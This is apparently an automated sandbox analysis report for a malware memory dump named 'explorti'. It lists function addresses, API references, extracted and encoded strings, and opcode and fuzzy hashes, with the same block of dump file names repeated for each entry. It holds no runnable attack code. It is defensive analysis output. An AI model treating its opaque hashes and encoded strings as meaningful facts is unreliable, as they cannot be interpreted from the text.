__floor_pentium4.LIBCMT ref: 005731E3

Strings

1#INF, xrefs: 0057439E
1#SNAN, xrefs: 0057437A
1#IND, xrefs: 00574373
1#QNAN, xrefs: 00574381

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1cc1017d356abff0cf79e5e4c9aec4a8466e70e7d4f77934139524ac9b40a49a
Instruction ID: fac95eb6c683dfca50b2713e69372b8f7f2c943083f0715cd8244b3cc339f27d
Opcode Fuzzy Hash: 1cc1017d356abff0cf79e5e4c9aec4a8466e70e7d4f77934139524ac9b40a49a
Instruction Fuzzy Hash: 28C25D71E042288FDB25CE28ED447E9BBB5FB48314F1485EAD84DE7241E774AE85AF40

Function 00572BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: d07a577995ff0b7ff3e1a3e13b6d2aec4fb5a8a85d417c19c616c14632494941
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 08F14F71E002199FDF14CFA9D8806AEBBB5FF88314F15826DD819AB345D731AE41DB90

Function 0054CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0054CE82,?,?,?,?,0054CEB7,?,?,?,?,?,?,0054C42D,?,00000001), ref: 0054CB33

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 3cd3c0053212a62e8a8d2ec16c8ce1759104ead8645ed1a9678c0b570b5cdd32
Instruction ID: ff36873678f57f410fc9034a211986b2b42af44e1f7bc77a5709b3f7fca6a0b9
Opcode Fuzzy Hash: 3cd3c0053212a62e8a8d2ec16c8ce1759104ead8645ed1a9678c0b570b5cdd32
Instruction Fuzzy Hash: DAD0223260303C93CA422B90FC098ECBF08EE44B643800112ED0563130CE505C046BE0

Function 00567D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00567EFF

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 3f65e85ea609609aa8550175612486759b8a67b564bd053418e708d8f727b7da
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: D051687020C64D97DB388A3888997BEAFAEBF5D34CF140D59D442D7682DA139E8CC351

Function 00534CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3da991177d42032d5dc01f9ea524cb0a16ec247bcd2dd91d6dfe65b42494535
Instruction ID: cc516eef2e1c9903ec396a63165425ef28b043a00289d1d91b85dda8ed7b4b4c
Opcode Fuzzy Hash: e3da991177d42032d5dc01f9ea524cb0a16ec247bcd2dd91d6dfe65b42494535
Instruction Fuzzy Hash: F92260B3F515145BDB0CCB9DDCA27ECB2E3AFD8214B0E803DA40AE3345EA79D9159A44

Function 00576F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344d85a18966a46fd8507da58bb7900ca3d6ccd56fa0e8d39a21affcec630c26
Instruction ID: 943884ca97cd4821474b2e86d647850f59c178a65e2c447d01674025299c15fc
Opcode Fuzzy Hash: 344d85a18966a46fd8507da58bb7900ca3d6ccd56fa0e8d39a21affcec630c26
Instruction Fuzzy Hash: 98B159312146099FD715CF28E48AB657FA0FF49364F65C658E899CF2A1C335E982DF40

Function 00534AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c951f7ba04e513b2208ab3c1e6991cac91e5eb32041349af697f8eda80f47fe5
Instruction ID: 832b811bcd86a2b0e0d6b785de3200f135156cb6c7021b5a2001b17d7555247e
Opcode Fuzzy Hash: c951f7ba04e513b2208ab3c1e6991cac91e5eb32041349af697f8eda80f47fe5
Instruction Fuzzy Hash: FB519F756083918FD319CF29841523ABFE1BFD5200F084A9EE5E697252D774E908CB91

Function 0057777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f49757d141c197abb65cb18ad528de05f6bb359b148d4e7f7ca42e746432d4c
Instruction ID: ad6bd70ba804746c12dd29cd33b4cb53a33dd2b59d23c32ac525a5cae4aa8506
Opcode Fuzzy Hash: 6f49757d141c197abb65cb18ad528de05f6bb359b148d4e7f7ca42e746432d4c
Instruction Fuzzy Hash: 8421B673F204394B770CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D968D917E2E4

Function 0057765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd7d2ceab70894c43f193936df916108c7fba7e2b76651c1882a889179111e4
Instruction ID: 173eecc7c5f441620f74895231ff4392ea271dddb0baa4f3ea0d10d9c42565cd
Opcode Fuzzy Hash: 9fd7d2ceab70894c43f193936df916108c7fba7e2b76651c1882a889179111e4
Instruction Fuzzy Hash: 6B117723F30C295A675C816D8C1727AA5D2EBD825071F533AD826E7284E994DE23D290

Function 00578720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d73408d51f88ae6cc87502d37a66309026a74d825df9996abd1052c1950dc5ea
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8611E97728014147D60C8A2DF9FC6B6AF95FBD532173CC375D04B4B658D9239945F500

Function 0056645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41183a75b3007f415a38fc604c9a813db706a68bb15cab6f374b62009b7f83d1
Instruction ID: 5dc0e172ae0ce48884c76ba8b84c57ddead7e3dfdd219530efe184c6f97aa59c
Opcode Fuzzy Hash: 41183a75b3007f415a38fc604c9a813db706a68bb15cab6f374b62009b7f83d1
Instruction Fuzzy Hash: 05E08C3025064CAFCF257B18C88DD893F9AFF92342F004804F80447221CFB9ED81C990

Function 0056A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: c6eb183c1e861535601e97b3162a86daa0ef2eaaf3be23fecbb64923ca252167
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 5EE0B672A15228EBCB15DB98894898AF6ACFB8AB50F554496B501E3252C370DF40CBD1

Function 00542E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

6JLUcxtnEx==, xrefs: 00542EC7
Dy==, xrefs: 0054369E
246122658369, xrefs: 005433D4
stoi argument out of range, xrefs: 00544269
FAml, xrefs: 0054378F
UFy=, xrefs: 005433BA
invalid stoi argument, xrefs: 0054425A

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
API String ID: 0-3273830296
Opcode ID: d852f890f0febe04308ab8fe4f57bec39b744bc194beac1b6964f5a65814f141
Instruction ID: dcdcaee6496786797f8d61773f3fff1746702a13cb8323dc7effee06624af3a3
Opcode Fuzzy Hash: d852f890f0febe04308ab8fe4f57bec39b744bc194beac1b6964f5a65814f141
Instruction Fuzzy Hash: C002BF70900249EBEF14EFA8C859BDEBFB5FF45308F504558E805A7282D7759A88CFA1

Function 00564770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005647A7
___except_validate_context_record.LIBVCRUNTIME ref: 005647AF
_ValidateLocalCookies.LIBCMT ref: 00564838
__IsNonwritableInCurrentImage.LIBCMT ref: 00564863
_ValidateLocalCookies.LIBCMT ref: 005648B8

Strings

csm, xrefs: 0056484D

Memory Dump Source

Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true

Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_530000_explorti.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 807fd5c3d913892f8b65c2faecd8832b480821a8f6154c35048ddaa15308f9db
Instruction ID: 914c625e643e9b368237e661de5437037b5e1deffc1dc951c2ec3271805e86c4
Opcode Fuzzy Hash: 807fd5c3d913892f8b65c2faecd8832b480821a8f6154c35048ddaa15308f9db
Instruction Fuzzy Hash: 6F51B534A00249ABCF10DF68D885AAE7FB5FF56314F148195E8189B352D732EE15CF90

Function 00547870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0054795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00547968
__Mtx_destroy_in_situ.LIBCPMT ref: 00547971

Strings

d+Y, xrefs: 00547904, 00547912, 0054790A
@yT, xrefs: 0054794A
'kTd+Y, xrefs: 00547879, 0054790B

Memory Dump Source

